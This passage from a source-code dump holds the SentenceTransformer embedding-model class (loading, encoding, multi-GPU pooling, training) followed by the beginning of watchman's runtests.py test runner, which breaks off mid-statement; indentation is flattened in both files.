from . import __version__
logger = logging.getLogger(__name__)
class SentenceTransformer(nn.Sequential):
"""
Loads or creates a SentenceTransformer model that can be used to map sentences / text to embeddings.
:param model_name_or_path: If it is a filepath on disc, it loads the model from that path. If it is not a path, it first tries to download a pre-trained SentenceTransformer model. If that fails, tries to construct a model from Huggingface models repository with that name.
:param modules: This parameter can be used to create custom SentenceTransformer models from scratch.
:param device: Device (like 'cuda' / 'cpu') that should be used for computation. If None, checks if a GPU can be used.
"""
def __init__(self, model_name_or_path: str = None, modules: Iterable[nn.Module] = None, device: str = None):
if model_name_or_path is not None and model_name_or_path != "":
logger.info("Load pretrained SentenceTransformer: {}".format(model_name_or_path))
model_path = model_name_or_path
if not os.path.isdir(model_path) and not model_path.startswith('http://') and not model_path.startswith('https://'):
logger.info("Did not find folder {}".format(model_path))
if '\\' in model_path or model_path.count('/') > 1:
raise AttributeError("Path {} not found".format(model_path))
model_path = __DOWNLOAD_SERVER__ + model_path + '.zip'
logger.info("Try to download model from server: {}".format(model_path))
if model_path.startswith('http://') or model_path.startswith('https://'):
model_url = model_path
folder_name = model_url.replace("https://", "").replace("http://", "").replace("/", "_")[:250].rstrip('.zip')
cache_folder = os.getenv('SENTENCE_TRANSFORMERS_HOME')
if cache_folder is None:
try:
from torch.hub import _get_torch_home
torch_cache_home = _get_torch_home()
except ImportError:
torch_cache_home = os.path.expanduser(os.getenv('TORCH_HOME', os.path.join(os.getenv('XDG_CACHE_HOME', '~/.cache'), 'torch')))
cache_folder = os.path.join(torch_cache_home, 'sentence_transformers')
model_path = os.path.join(cache_folder, folder_name)
if not os.path.exists(model_path) or not os.listdir(model_path):
if model_url[-1] == "/":
model_url = model_url[:-1]
logger.info("Downloading sentence transformer model from {} and saving it at {}".format(model_url, model_path))
model_path_tmp = model_path.rstrip("/").rstrip("\\")+"_part"
try:
zip_save_path = os.path.join(model_path_tmp, 'model.zip')
http_get(model_url, zip_save_path)
with ZipFile(zip_save_path, 'r') as zip:
zip.extractall(model_path_tmp)
os.remove(zip_save_path)
os.rename(model_path_tmp, model_path)
except requests.exceptions.HTTPError as e:
shutil.rmtree(model_path_tmp)
if e.response.status_code == 404:
logger.warning('SentenceTransformer-Model {} not found. Try to create it from scratch'.format(model_url))
logger.warning('Try to create Transformer Model {} with mean pooling'.format(model_name_or_path))
model_path = None
transformer_model = Transformer(model_name_or_path)
pooling_model = Pooling(transformer_model.get_word_embedding_dimension())
modules = [transformer_model, pooling_model]
else:
raise e
except Exception as e:
shutil.rmtree(model_path)
raise e
#### Load from disk
if model_path is not None:
logger.info("Load SentenceTransformer from folder: {}".format(model_path))
if os.path.exists(os.path.join(model_path, 'config.json')):
with open(os.path.join(model_path, 'config.json')) as fIn:
config = json.load(fIn)
if config['__version__'] > __version__:
logger.warning("You try to use a model that was created with version {}, however, your version is {}. This might cause unexpected behavior or errors. In that case, try to update to the latest version.\n\n\n".format(config['__version__'], __version__))
with open(os.path.join(model_path, 'modules.json')) as fIn:
contained_modules = json.load(fIn)
modules = OrderedDict()
for module_config in contained_modules:
module_class = import_from_string(module_config['type'])
module = module_class.load(os.path.join(model_path, module_config['path']))
modules[module_config['name']] = module
if modules is not None and not isinstance(modules, OrderedDict):
modules = OrderedDict([(str(idx), module) for idx, module in enumerate(modules)])
super().__init__(modules)
if device is None:
device = "cuda" if torch.cuda.is_available() else "cpu"
logger.info("Use pytorch device: {}".format(device))
self._target_device = torch.device(device)
def encode(self, sentences: Union[str, List[str], List[int]],
batch_size: int = 32,
show_progress_bar: bool = None,
output_value: str = 'sentence_embedding',
convert_to_numpy: bool = True,
convert_to_tensor: bool = False,
is_pretokenized: bool = False,
device: str = None,
num_workers: int = 0) -> Union[List[Tensor], ndarray, Tensor]:
"""
Computes sentence embeddings
:param sentences: the sentences to embed
:param batch_size: the batch size used for the computation
:param show_progress_bar: Output a progress bar when encoding sentences
:param output_value: Default sentence_embedding, to get sentence embeddings. Can be set to token_embeddings to get wordpiece token embeddings.
:param convert_to_numpy: If true, the output is a list of numpy vectors. Else, it is a list of pytorch tensors.
:param convert_to_tensor: If true, you get one large tensor as return. Overwrites any setting from convert_to_numpy
:param is_pretokenized: DEPRECATED - No longer used
:param device: Which torch.device to use for the computation
:param num_workers: DEPRECATED - No longer used
:return:
By default, a list of tensors is returned. If convert_to_tensor, a stacked tensor is returned. If convert_to_numpy, a numpy matrix is returned.
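Example (illustrative sketch; 'model-name-or-path' is a placeholder for any
pretrained model name or local model directory)::

model = SentenceTransformer('model-name-or-path')
embeddings = model.encode(["This is a sentence.", "Here is another one."],
batch_size=32, convert_to_numpy=True)
print(embeddings.shape)  # (2, <embedding dimension>)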
"""
self.eval()
if show_progress_bar is None:
show_progress_bar = (logger.getEffectiveLevel()==logging.INFO or logger.getEffectiveLevel()==logging.DEBUG)
input_was_string = False
if isinstance(sentences, str): #Cast an individual sentence to a list with length 1
sentences = [sentences]
input_was_string = True
if device is None:
device = self._target_device
self.to(device)
all_embeddings = []
length_sorted_idx = np.argsort([self._text_length(sen) for sen in sentences])
sentences_sorted = [sentences[idx] for idx in length_sorted_idx]
iterator = range(0, len(sentences), batch_size)
if show_progress_bar:
iterator = tqdm(iterator, desc="Batches")
for start_index in iterator:
sentences_batch = sentences_sorted[start_index:start_index+batch_size]
features = self.tokenize(sentences_batch)
features = batch_to_device(features, device)
with torch.no_grad():
out_features = self.forward(features)
embeddings = out_features[output_value]
if output_value == 'token_embeddings':
#Set token embeddings to 0 for padding tokens
input_mask = out_features['attention_mask']
input_mask_expanded = input_mask.unsqueeze(-1).expand(embeddings.size()).float()
embeddings = embeddings * input_mask_expanded
embeddings = embeddings.detach()
# fixes for #522 and #487
# to avoid oom problems on gpu with large datasets
if convert_to_numpy:
embeddings = embeddings.cpu()
all_embeddings.extend(embeddings)
all_embeddings = [all_embeddings[idx] for idx in np.argsort(length_sorted_idx)]
if convert_to_tensor:
all_embeddings = torch.stack(all_embeddings)
elif convert_to_numpy:
all_embeddings = np.asarray([emb.numpy() for emb in all_embeddings])
if input_was_string:
all_embeddings = all_embeddings[0]
return all_embeddings
def start_multi_process_pool(self, target_devices: List[str] = None):
"""
Starts a multi-process pool to perform the encoding with several independent processes.
This method is recommended if you want to encode on multiple GPUs. It is advised
to start only one process per GPU. This method works together with encode_multi_process
:param target_devices: PyTorch target devices, e.g. cuda:0, cuda:1... If None, all available CUDA devices will be used
:return: Returns a dict with the target processes, an input queue, and an output queue.
"""
if target_devices is None:
if torch.cuda.is_available():
target_devices = ['cuda:{}'.format(i) for i in range(torch.cuda.device_count())]
else:
logger.info("CUDA is not available. Start 4 CPU worker")
target_devices = ['cpu']*4
logger.info("Start multi-process pool on devices: {}".format(', '.join(map(str, target_devices))))
ctx = mp.get_context('spawn')
input_queue = ctx.Queue()
output_queue = ctx.Queue()
processes = []
for cuda_id in target_devices:
p = ctx.Process(target=SentenceTransformer._encode_multi_process_worker, args=(cuda_id, self, input_queue, output_queue), daemon=True)
p.start()
processes.append(p)
return {'input': input_queue, 'output': output_queue, 'processes': processes}
@staticmethod
def stop_multi_process_pool(pool):
"""
Stops all processes started with start_multi_process_pool
"""
for p in pool['processes']:
p.terminate()
for p in pool['processes']:
p.join()
p.close()
pool['input'].close()
pool['output'].close()
def encode_multi_process(self, sentences: List[str], pool: Dict[str, object], batch_size: int = 32, chunk_size: int = None):
"""
This method allows running encode() on multiple GPUs. The sentences are chunked into smaller packages
and sent to individual processes, which encode these on the different GPUs. This method is only suitable
for encoding large sets of sentences
:param sentences: List of sentences
:param pool: A pool of workers started with SentenceTransformer.start_multi_process_pool
:param batch_size: Encode sentences with batch size
:param chunk_size: Sentences are chunked and sent to the individual processes. If None, a sensible size is determined.
:return: Numpy matrix with all embeddings
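Example (illustrative sketch; the model name is a placeholder, and the snippet is
expected to run under an ``if __name__ == '__main__':`` guard because the pool
uses the 'spawn' start method)::

model = SentenceTransformer('model-name-or-path')
pool = model.start_multi_process_pool()
embeddings = model.encode_multi_process(sentences, pool, batch_size=32)
model.stop_multi_process_pool(pool)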
"""
if chunk_size is None:
chunk_size = min(math.ceil(len(sentences) / len(pool["processes"]) / 10), 5000)
logger.info("Chunk data into packages of size {}".format(chunk_size))
input_queue = pool['input']
last_chunk_id = 0
chunk = []
for sentence in sentences:
chunk.append(sentence)
if len(chunk) >= chunk_size:
input_queue.put([last_chunk_id, batch_size, chunk])
last_chunk_id += 1
chunk = []
if len(chunk) > 0:
input_queue.put([last_chunk_id, batch_size, chunk])
last_chunk_id += 1
output_queue = pool['output']
results_list = sorted([output_queue.get() for _ in range(last_chunk_id)], key=lambda x: x[0])
embeddings = np.concatenate([result[1] for result in results_list])
return embeddings
@staticmethod
def _encode_multi_process_worker(target_device: str, model, input_queue, results_queue):
"""
Internal working process to encode sentences in multi-process setup
"""
while True:
try:
id, batch_size, sentences = input_queue.get()
embeddings = model.encode(sentences, device=target_device, show_progress_bar=False, convert_to_numpy=True, batch_size=batch_size)
results_queue.put([id, embeddings])
except queue.Empty:
break
def get_max_seq_length(self):
"""
Returns the maximal sequence length of inputs the model accepts. Longer inputs will be truncated.
"""
if hasattr(self._first_module(), 'max_seq_length'):
return self._first_module().max_seq_length
return None
def tokenize(self, text: str):
"""
Tokenizes the text
"""
return self._first_module().tokenize(text)
def get_sentence_features(self, *features):
return self._first_module().get_sentence_features(*features)
def get_sentence_embedding_dimension(self):
for mod in reversed(self._modules.values()):
sent_embedding_dim_method = getattr(mod, "get_sentence_embedding_dimension", None)
if callable(sent_embedding_dim_method):
return sent_embedding_dim_method()
return None
def _first_module(self):
"""Returns the first module of this sequential embedder"""
return self._modules[next(iter(self._modules))]
def _last_module(self):
"""Returns the last module of this sequential embedder"""
return self._modules[next(reversed(self._modules))]
def save(self, path):
"""
Saves all elements for this seq. sentence embedder into different sub-folders
"""
if path is None:
return
os.makedirs(path, exist_ok=True)
logger.info("Save model to {}".format(path))
contained_modules = []
for idx, name in enumerate(self._modules):
module = self._modules[name]
model_path = os.path.join(path, str(idx)+"_"+type(module).__name__)
os.makedirs(model_path, exist_ok=True)
module.save(model_path)
contained_modules.append({'idx': idx, 'name': name, 'path': os.path.basename(model_path), 'type': type(module).__module__})
with open(os.path.join(path, 'modules.json'), 'w') as fOut:
json.dump(contained_modules, fOut, indent=2)
with open(os.path.join(path, 'config.json'), 'w') as fOut:
json.dump({'__version__': __version__}, fOut, indent=2)
def smart_batching_collate(self, batch):
"""
Transforms a batch from a SmartBatchingDataset to a batch of tensors for the model
Here, batch is a list of tuples: [(tokens, label), ...]
:param batch:
a batch from a SmartBatchingDataset
:return:
a batch of tensors for the model
"""
num_texts = len(batch[0].texts)
texts = [[] for _ in range(num_texts)]
labels = []
for example in batch:
for idx, text in enumerate(example.texts):
texts[idx].append(text)
labels.append(example.label)
labels = torch.tensor(labels).to(self._target_device)
sentence_features = []
for idx in range(num_texts):
tokenized = self.tokenize(texts[idx])
batch_to_device(tokenized, self._target_device)
sentence_features.append(tokenized)
return sentence_features, labels
def _text_length(self, text: Union[List[int], List[List[int]]]):
"""
Helper function to get the length of the input text. Text can be either
a list of ints (a single tokenized text) or a list of lists of ints
(representing several tokenized texts passed to the model).
"""
if isinstance(text, dict):
return len(next(iter(text.values())))
elif len(text) == 0 or isinstance(text[0], int):
return len(text)
else:
return sum([len(t) for t in text])
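# Worked examples for _text_length (illustrative):
#   _text_length({'input_ids': [1, 2, 3]})  -> 3  (dict: length of the first value)
#   _text_length([1, 2, 3, 4])              -> 4  (single tokenized text)
#   _text_length([[1, 2], [3, 4, 5]])       -> 5  (sum over several texts)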
def fit(self,
train_objectives: Iterable[Tuple[DataLoader, nn.Module]],
evaluator: SentenceEvaluator = None,
epochs: int = 1,
steps_per_epoch = None,
scheduler: str = 'WarmupLinear',
warmup_steps: int = 10000,
optimizer_class: Type[Optimizer] = transformers.AdamW,
optimizer_params : Dict[str, object]= {'lr': 2e-5, 'eps': 1e-6, 'correct_bias': False},
weight_decay: float = 0.01,
evaluation_steps: int = 0,
output_path: str = None,
save_best_model: bool = True,
max_grad_norm: float = 1,
use_amp: bool = False,
callback: Callable[[float, int, int], None] = None,
output_path_ignore_not_empty: bool = False
):
"""
Train the model with the given training objective
Each training objective is sampled in turn for one batch.
We sample only as many batches from each objective as the smallest one provides,
to ensure roughly equal training on each dataset.
:param train_objectives: Tuples of (DataLoader, LossFunction). Pass more than one for multi-task learning
:param evaluator: An evaluator (sentence_transformers.evaluation) evaluates the model performance during training on held-out dev data. It is used to determine the best model that is saved to disc.
:param epochs: Number of epochs for training
:param steps_per_epoch: Number of training steps per epoch. If set to None (default), one epoch equals the size of the smallest DataLoader in train_objectives.
:param scheduler: Learning rate scheduler. Available schedulers: constantlr, warmupconstant, warmuplinear, warmupcosine, warmupcosinewithhardrestarts
:param warmup_steps: Behavior depends on the scheduler. For WarmupLinear (default), the learning rate is increased from 0 up to the maximal learning rate over warmup_steps training steps, after which it is decreased linearly back to zero.
:param optimizer_class: Optimizer
:param optimizer_params: Optimizer parameters
:param weight_decay: Weight decay for model parameters
:param evaluation_steps: If > 0, evaluate the model using evaluator after each number of training steps
:param output_path: Storage path for the model and evaluation files
:param save_best_model: If true, the best model (according to evaluator) is stored at output_path
:param max_grad_norm: Used for gradient clipping (maximum norm of the gradients).
:param use_amp: Use Automatic Mixed Precision (AMP). Only for Pytorch >= 1.6.0
:param callback: Callback function that is invoked after each evaluation.
It must accept the following three parameters in this order:
`score`, `epoch`, `steps`
:param output_path_ignore_not_empty: deprecated, no longer used
"""
if use_amp:
from torch.cuda.amp import autocast
scaler = torch.cuda.amp.GradScaler()
self.to(self._target_device)
if output_path is not None:
os.makedirs(output_path, exist_ok=True)
dataloaders = [dataloader for dataloader, _ in train_objectives]
# Use smart batching
for dataloader in dataloaders:
dataloader.collate_fn = self.smart_batching_collate
loss_models = [loss for _, loss in train_objectives]
for loss_model in loss_models:
loss_model.to(self._target_device)
self.best_score = -9999999
if steps_per_epoch is None or steps_per_epoch == 0:
steps_per_epoch = min([len(dataloader) for dataloader in dataloaders])
num_train_steps = int(steps_per_epoch * epochs)
# Prepare optimizers
optimizers = []
schedulers = []
for loss_model in loss_models:
param_optimizer = list(loss_model.named_parameters())
no_decay = ['bias', 'LayerNorm.bias', 'LayerNorm.weight']
optimizer_grouped_parameters = [
{'params': [p for n, p in param_optimizer if not any(nd in n for nd in no_decay)], 'weight_decay': weight_decay},
{'params': [p for n, p in param_optimizer if any(nd in n for nd in no_decay)], 'weight_decay': 0.0}
]
optimizer = optimizer_class(optimizer_grouped_parameters, **optimizer_params)
scheduler_obj = self._get_scheduler(optimizer, scheduler=scheduler, warmup_steps=warmup_steps, t_total=num_train_steps)
optimizers.append(optimizer)
schedulers.append(scheduler_obj)
global_step = 0
data_iterators = [iter(dataloader) for dataloader in dataloaders]
num_train_objectives = len(train_objectives)
skip_scheduler = False
for epoch in trange(epochs, desc="Epoch"):
training_steps = 0
for loss_model in loss_models:
loss_model.zero_grad()
loss_model.train()
for _ in trange(steps_per_epoch, desc="Iteration", smoothing=0.05):
for train_idx in range(num_train_objectives):
loss_model = loss_models[train_idx]
optimizer = optimizers[train_idx]
scheduler = schedulers[train_idx]
data_iterator = data_iterators[train_idx]
try:
data = next(data_iterator)
except StopIteration:
data_iterator = iter(dataloaders[train_idx])
data_iterators[train_idx] = data_iterator
data = next(data_iterator)
features, labels = data
"""
num_texts = len(data[0].texts)
texts = [[] for _ in range(num_texts)]
labels = []
for example in data:
labels.append(data.label)
for idx in range(num_texts):
texts[idx].append(example.texts[idx])
features = self.tokenize(texts)
features = batch_to_device(features, self._target_device)
labels = torch.stack(labels).to(self._target_device)
"""
if use_amp:
with autocast():
loss_value = loss_model(features, labels)
scale_before_step = scaler.get_scale()
scaler.scale(loss_value).backward()
scaler.unscale_(optimizer)
torch.nn.utils.clip_grad_norm_(loss_model.parameters(), max_grad_norm)
scaler.step(optimizer)
scaler.update()
skip_scheduler = scaler.get_scale() != scale_before_step
else:
loss_value = loss_model(features, labels)
loss_value.backward()
torch.nn.utils.clip_grad_norm_(loss_model.parameters(), max_grad_norm)
optimizer.step()
optimizer.zero_grad()
if not skip_scheduler:
scheduler.step()
training_steps += 1
global_step += 1
if evaluation_steps > 0 and training_steps % evaluation_steps == 0:
self._eval_during_training(evaluator, output_path, save_best_model, epoch,
training_steps, callback)
for loss_model in loss_models:
loss_model.zero_grad()
loss_model.train()
self._eval_during_training(evaluator, output_path, save_best_model, epoch, -1, callback)
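# Hedged usage sketch (not part of the original module): a minimal single-task
# training call. The DataLoader comes from torch.utils.data and the loss class
# named below is an assumption about the surrounding library.
#
#   train_dataloader = DataLoader(train_examples, shuffle=True, batch_size=16)
#   train_loss = losses.CosineSimilarityLoss(model)
#   model.fit(train_objectives=[(train_dataloader, train_loss)],
#             epochs=1, warmup_steps=100, output_path='output/my-model')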
def evaluate(self, evaluator: SentenceEvaluator, output_path: str = None):
"""
Evaluate the model
:param evaluator:
the evaluator
:param output_path:
the evaluator can write the results to this path
"""
if output_path is not None:
os.makedirs(output_path, exist_ok=True)
return evaluator(self, output_path)
def _eval_during_training(self, evaluator, output_path, save_best_model, epoch, steps, callback):
"""Runs evaluation during the training"""
if evaluator is not None:
score = evaluator(self, output_path=output_path, epoch=epoch, steps=steps)
if callback is not None:
callback(score, epoch, steps)
if score > self.best_score:
self.best_score = score
if save_best_model:
self.save(output_path)
@staticmethod
def _get_scheduler(optimizer, scheduler: str, warmup_steps: int, t_total: int):
"""
Returns the correct learning rate scheduler. Available schedulers: constantlr, warmupconstant, warmuplinear, warmupcosine, warmupcosinewithhardrestarts
"""
scheduler = scheduler.lower()
if scheduler == 'constantlr':
return transformers.get_constant_schedule(optimizer)
elif scheduler == 'warmupconstant':
return transformers.get_constant_schedule_with_warmup(optimizer, num_warmup_steps=warmup_steps)
elif scheduler == 'warmuplinear':
return transformers.get_linear_schedule_with_warmup(optimizer, num_warmup_steps=warmup_steps, num_training_steps=t_total)
elif scheduler == 'warmupcosine':
return transformers.get_cosine_schedule_with_warmup(optimizer, num_warmup_steps=warmup_steps, num_training_steps=t_total)
elif scheduler == 'warmupcosinewithhardrestarts':
return transformers.get_cosine_with_hard_restarts_schedule_with_warmup(optimizer, num_warmup_steps=warmup_steps, num_training_steps=t_total)
else:
raise ValueError("Unknown scheduler {}".format(scheduler))
@property
def device(self) -> device:
"""
Get torch.device from module, assuming that the whole module has one device.
"""
try:
return next(self.parameters()).device
except StopIteration:
# For nn.DataParallel compatibility in PyTorch 1.5
def find_tensor_attributes(module: nn.Module) -> List[Tuple[str, Tensor]]:
tuples = [(k, v) for k, v in module.__dict__.items() if torch.is_tensor(v)]
return tuples
gen = self._named_members(get_members_fn=find_tensor_attributes)
first_tuple = next(gen)
return first_tuple[1].device
@property
def tokenizer(self):
"""
Property to get the tokenizer that is used by this model
"""
return self._first_module().tokenizer
@tokenizer.setter
def tokenizer(self, value):
"""
Property to set the tokenizer that should be used by this model
"""
self._first_module().tokenizer = value
@property
def max_seq_length(self):
"""
Property to get the maximal input sequence length for the model. Longer inputs will be truncated.
"""
return self._first_module().max_seq_length
@max_seq_length.setter
def max_seq_length(self, value):
"""
Property to set the maximal input sequence length for the model. Longer inputs will be truncated.
"""
self._first_module().max_seq_length = value
|
runtests.py
|
#!/usr/bin/env python3
# vim:ts=4:sw=4:et:
# Copyright (c) Facebook, Inc. and its affiliates.
#
# This source code is licensed under the MIT license found in the
# LICENSE file in the root directory of this source tree.
# no unicode literals
from __future__ import absolute_import, division, print_function
import argparse
import json
import math
import multiprocessing
import os
import os.path
import random
import shutil
import signal
import subprocess
import sys
import tempfile
import threading
import time
import traceback
# in the FB internal test infra, ensure that we are running from the
# dir that houses this script rather than some other higher level dir
# in the containing tree. We can't use __file__ to determine this
# because our PAR machinery can generate a name like /proc/self/fd/3/foo
# which won't resolve to anything useful by the time we get here.
if not os.path.exists("runtests.py") and os.path.exists("watchman/runtests.py"):
os.chdir("watchman")
try:
import unittest2 as unittest
except ImportError:
import unittest
# Ensure that we can find pywatchman and integration tests (if we're not the
# main module, a wrapper is probably loading us up and we shouldn't screw around
# with sys.path).
if __name__ == "__main__":
sys.path.insert(0, os.path.join(os.getcwd(), "python"))
sys.path.insert(1, os.path.join(os.getcwd(), "tests", "integration"))
sys.path.insert(1, os.path.join(os.getcwd(), "tests", "integration", "facebook"))
# Only Python 3.5+ supports native asyncio
has_asyncio = sys.version_info >= (3, 5)
if has_asyncio:
sys.path.insert(0, os.path.join(os.getcwd(), "tests", "async"))
import asyncio
try:
import queue
except Exception:
import Queue
queue = Queue
parser = argparse.ArgumentParser(
description="Run the watchman unit and integration tests"
)
parser.add_argument("-v", "--verbosity", default=2, help="test runner verbosity")
parser.add_argument(
"--keep",
action="store_true",
help="preserve all temporary files created during test execution",
)
parser.add_argument(
"--keep-if-fail",
action="store_true",
help="preserve all temporary files created during test execution if failed",
)
parser.add_argument("files", nargs="*", help="specify which test files to run")
parser.add_argument(
"--method", action="append", help="specify which python test method names to run"
)
def default_concurrency():
# Python 2.7 hangs when we use threads, so avoid it
# https://bugs.python.org/issue20318
if sys.version_info >= (3, 0):
level = min(4, math.ceil(1.5 * multiprocessing.cpu_count()))
if "CIRCLECI" in os.environ:
# Use fewer cores in circle CI because the inotify sysctls
# are pretty low, and we sometimes hit those limits.
level = level / 2
return int(level)
return 1
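# Worked example of the computation above (illustrative): on an 8-core machine,
# level = min(4, ceil(1.5 * 8)) = min(4, 12) = 4; under CIRCLECI that is halved
# to 2. On Python 2 the function always returns 1 to avoid the threading hang.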
parser.add_argument(
"--concurrency",
default=default_concurrency(),
type=int,
help="How many tests to run at once",
)
parser.add_argument(
"--watcher",
action="store",
default="auto",
help="Specify which watcher should be used to run the tests",
)
parser.add_argument(
"--debug-watchman",
action="store_true",
help="Pauses start up and prints out the PID for watchman server process."
+ "Forces concurrency to 1.",
)
parser.add_argument(
"--watchman-path", action="store", help="Specify the path to the watchman binary"
)
parser.add_argument(
"--win7", action="store_true", help="Set env to force win7 compatibility tests"
)
parser.add_argument(
"--retry-flaky",
action="store",
type=int,
default=2,
help="How many additional times to retry flaky tests.",
)
parser.add_argument(
"--testpilot-json",
action="store_true",
help="Output test results in Test Pilot JSON format",
)
parser.add_argument(
"--pybuild-dir",
action="store",
help="For out-of-src-tree builds, where the generated python lives",
)
args = parser.parse_args()
if args.pybuild_dir is not None:
sys.path.insert(0, os.path.realpath(args.pybuild_dir))
# Import our local stuff after we've had a chance to look at args.pybuild_dir.
# The `try` block prevents the imports from being reordered
try:
import Interrupt
import pywatchman
import TempDir
import WatchmanInstance
except ImportError:
raise
# We test for this in a test case
os.environ["WATCHMAN_EMPTY_ENV_VAR"] = ""
os.environ["HGUSER"] = "John Smith <smith@example.com>"
os.environ["NOSCMLOG"] = "1"
os.environ["WATCHMAN_NO_SPAWN"] = "1"
if args.win7:
os.environ["WATCHMAN_WIN7_COMPAT"] = "1"
# Ensure that we find the watchman we built in the tests
if args.watchman_path:
args.watchman_path = os.path.realpath(args.watchman_path)
bin_dir = os.path.dirname(args.watchman_path)
os.environ["WATCHMAN_BINARY"] = args.watchman_path
else:
bin_dir = os.path.dirname(__file__)
os.environ["PYWATCHMAN_PATH"] = os.path.join(os.getcwd(), "python")
os.environ["WATCHMAN_PYTHON_BIN"] = os.path.abspath(
os.path.join(os.getcwd(), "python", "bin")
)
os.environ["PATH"] = "%s%s%s" % (
os.path.abspath(bin_dir),
os.pathsep,
os.environ["PATH"],
)
# We'll put all our temporary stuff under one dir so that we
# can clean it all up at the end
temp_dir = TempDir.get_temp_dir(args.keep)
def interrupt_handler(signo, frame):
Interrupt.setInterrupted()
signal.signal(signal.SIGINT, interrupt_handler)
class Result(unittest.TestResult):
# Make it easier to spot success/failure by coloring the status
# green for pass, red for fail and yellow for skip.
# also print the elapsed time per test
transport = None
encoding = None
attempt = 0
def shouldStop(self):
if Interrupt.wasInterrupted():
return True
return super(Result, self).shouldStop()
def startTest(self, test):
self.startTime = time.time()
super(Result, self).startTest(test)
def addSuccess(self, test):
elapsed = time.time() - self.startTime
super(Result, self).addSuccess(test)
if args.testpilot_json:
print(
json.dumps(
{
"op": "test_done",
"status": "passed",
"test": test.id(),
"start_time": self.startTime,
"end_time": time.time(),
}
)
)
else:
print(
"\033[32mPASS\033[0m %s (%.3fs)%s"
% (test.id(), elapsed, self._attempts())
)
def addSkip(self, test, reason):
elapsed = time.time() - self.startTime
super(Result, self).addSkip(test, reason)
if args.testpilot_json:
print(
json.dumps(
{
"op": "test_done",
"status": "skipped",
"test": test.id(),
"details": reason,
"start_time": self.startTime,
"end_time": time.time(),
}
)
)
else:
print("\033[33mSKIP\033[0m %s (%.3fs) %s" % (test.id(), elapsed, reason))
def __printFail(self, test, err):
elapsed = time.time() - self.startTime
t, val, trace = err
if args.testpilot_json:
print(
json.dumps(
{
"op": "test_done",
"status": "failed",
"test": test.id(),
"details": "".join(traceback.format_exception(t, val, trace)),
"start_time": self.startTime,
"end_time": time.time(),
}
)
)
else:
print(
"\033[31mFAIL\033[0m %s (%.3fs)%s\n%s"
% (
test.id(),
elapsed,
self._attempts(),
"".join(traceback.format_exception(t, val, trace)),
)
)
def addFailure(self, test, err):
self.__printFail(test, err)
super(Result, self).addFailure(test, err)
def addError(self, test, err):
self.__printFail(test, err)
super(Result, self).addError(test, err)
def setAttemptNumber(self, attempt):
self.attempt = attempt
def _attempts(self):
if self.attempt > 0:
return " (%d attempts)" % self.attempt
return ""
def expandFilesList(files):
"""expand any dir names into a full list of files"""
res = []
for g in files:
if os.path.isdir(g):
for dirname, _dirs, files in os.walk(g):
for f in files:
if not f.startswith("."):
res.append(os.path.normpath(os.path.join(dirname, f)))
else:
res.append(os.path.normpath(g))
return res
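# Example (illustrative; the file name below is hypothetical): passing a
# directory such as "tests/integration" expands to every non-hidden file
# beneath it, e.g. tests/integration/test_example.py, which is then matched
# by shouldIncludeTestFile().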
if args.files:
args.files = expandFilesList(args.files)
def shouldIncludeTestFile(filename):
"""used by our loader to respect the set of tests to run"""
global args
fname = os.path.relpath(filename.replace(".pyc", ".py"))
if args.files:
for f in args.files:
if f == fname:
return True
return False
if args.method:
# implies python tests only
if not fname.endswith(".py"):
return False
return True
def shouldIncludeTestName(name):
"""used by our loader to respect the set of tests to run"""
global args
if args.method:
for f in args.method:
if f in name:
# the strict original interpretation of this flag
# was pretty difficult to use in practice, so we
# now also allow substring matches against the
# entire test name.
return True
return False
return True
class Loader(unittest.TestLoader):
"""allows us to control the subset of which tests are run"""
def __init__(self):
super(Loader, self).__init__()
def loadTestsFromTestCase(self, testCaseClass):
return super(Loader, self).loadTestsFromTestCase(testCaseClass)
def getTestCaseNames(self, testCaseClass):
names = super(Loader, self).getTestCaseNames(testCaseClass)
return filter(lambda name: shouldIncludeTestName(name), names)
def loadTestsFromModule(self, module, *args, **kw):
if not shouldIncludeTestFile(module.__file__):
return unittest.TestSuite()
return super(Loader, self).loadTestsFromModule(module, *args, **kw)
loader = Loader()
suite = unittest.TestSuite()
directories = ["python/tests", "tests/integration"]
facebook_directory = "tests/integration/facebook"
if os.path.exists(facebook_directory):
# the facebook dir isn't sync'd to github, but it
# is present internally, so it should remain in this list
directories += [facebook_directory]
if has_asyncio:
directories += ["tests/async"]
for d in directories:
suite.addTests(loader.discover(d, top_level_dir=d))
if os.name == "nt":
t_globs = "tests/*.exe"
else:
t_globs = "tests/*.t"
tls = threading.local()
# Manage printing from concurrent threads
# http://stackoverflow.com/a/3030755/149111
class ThreadSafeFile(object):
def __init__(self, f):
self.f = f
self.lock = threading.RLock()
self.nesting = 0
def _getlock(self):
self.lock.acquire()
self.nesting += 1
def _droplock(self):
nesting = self.nesting
self.nesting = 0
for _ in range(nesting):
self.lock.release()
def __getattr__(self, name):
if name == "softspace":
return tls.softspace
else:
raise AttributeError(name)
def __setattr__(self, name, value):
if name == "softspace":
tls.softspace = value
else:
return object.__setattr__(self, name, value)
def write(self, data):
self._getlock()
self.f.write(data)
if data == "\n":
self._droplock()
def flush(self):
self._getlock()
self.f.flush()
self._droplock()
sys.stdout = ThreadSafeFile(sys.stdout)
tests_queue = queue.Queue()
results_queue = queue.Queue()
def runner():
global results_queue
global tests_queue
broken = False
try:
# Start up a shared watchman instance for the tests.
inst = WatchmanInstance.Instance(
{"watcher": args.watcher}, debug_watchman=args.debug_watchman
)
inst.start()
# Allow tests to locate this default instance
WatchmanInstance.setSharedInstance(inst)
if has_asyncio:
# Each thread will have its own event loop
asyncio.set_event_loop(asyncio.new_event_loop())
except Exception as e:
print("while starting watchman: %s" % str(e))
traceback.print_exc()
broken = True
while not broken:
test = tests_queue.get()
try:
if test == "terminate":
break
if Interrupt.wasInterrupted() or broken:
continue
result = None
for attempt in range(0, args.retry_flaky + 1):
# Check liveness of the server
try:
client = pywatchman.client(timeout=3.0, sockpath=inst.getSockPath())
client.query("version")
client.close()
except Exception as exc:
print(
"Failed to connect to watchman server: %s; starting a new one"
% exc
)
try:
inst.stop()
except Exception:
pass
try:
inst = WatchmanInstance.Instance(
{"watcher": args.watcher},
debug_watchman=args.debug_watchman,
)
inst.start()
# Allow tests to locate this default instance
WatchmanInstance.setSharedInstance(inst)
except Exception as e:
print("while starting watchman: %s" % str(e))
traceback.print_exc()
broken = True
continue
try:
result = Result()
result.setAttemptNumber(attempt)
if hasattr(test, "setAttemptNumber"):
test.setAttemptNumber(attempt)
test.run(result)
if hasattr(test, "setAttemptNumber") and not result.wasSuccessful():
# Facilitate retrying this possibly flaky test
continue
break
except Exception as e:
print(e)
if hasattr(test, "setAttemptNumber") and not result.wasSuccessful():
# Facilitate retrying this possibly flaky test
continue
if (
not result.wasSuccessful()
and "TRAVIS" in os.environ
